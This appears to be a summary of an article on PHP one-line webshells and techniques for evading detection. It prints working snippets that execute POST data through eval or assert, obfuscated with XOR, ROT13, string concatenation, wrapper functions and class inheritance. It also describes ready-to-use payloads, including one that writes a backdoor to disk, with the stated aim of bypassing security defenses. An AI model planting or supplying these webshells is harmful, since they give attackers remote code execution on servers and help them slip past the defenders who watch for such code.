PHP One‑Liner Webshells and Evasion Techniques

The article begins with a simple one‑line PHP webshell using <?php eval($_POST['a']); ?> and shows a variant with the error‑suppression operator @ , explaining how the @ hides errors and can be placed before eval or $_POST .

It then compares eval() and assert() , noting that assert() executes an expression only when it evaluates to true, making it a less‑sensitive alternative to eval() . The author suggests using assert to avoid detection and mentions other sensitive functions like system , $_GET , etc.

Various string‑based evasion techniques are introduced:

XOR encryption, e.g., <?php $_=("%01"^"`"); $__='_' . ("%0D"^']'); $___=$$__; $_($___[_]); ?>

Base64/Base16/Base32 encoding, e.g., <?php $a='d2hvYW1p'; echo base64_decode($a); ?>

ROT13 encoding, e.g., <?php $a=str_rot13('riny'); $a($_POST['110']); ?>

String concatenation to rebuild function names, e.g., <?php $k="e"."v"."a"."l"; $k(${"_PO"."ST"}["110"]); ?>

Further evasion ideas include function replacement, custom wrapper functions, callback chains, array‑based tricks, variable variables, and class‑based payloads. Example of custom functions bypassing case‑sensitivity:

<?php function aaa($a){return $a;} function bbb($b){return eval($b);} function post(){return @$_POST['110'];} aaa(bbb)(aaa(post)()); ?>

Class‑based evasion is shown with a class extending another to retrieve POST data and execute it via assert :

<?php class zeo2{public $b=''; function post(){return $_POST['x'];}} class zeo extends zeo2{public $code=null; function __construct(){ $code=parent::post(); assert($code);}} $blll=new zeo; ?>

Version‑specific payloads are described, such as using a backslash before echo for PHP 5.2, hexadecimal string tricks for PHP 5.3/5.5, and the null‑coalescing operator ?? for PHP 7.3.4 to execute commands via GET parameters.

The article concludes with a collection of ready‑to‑use one‑liner shell examples, including a base64‑encoded payload that writes a PHP backdoor to disk, and a more complex payload using SplPriorityQueue and error handling to execute arbitrary code.

Overall, the piece aims to give readers a comprehensive understanding of one‑line PHP webshell creation and various evasion techniques to bypass modern security defenses.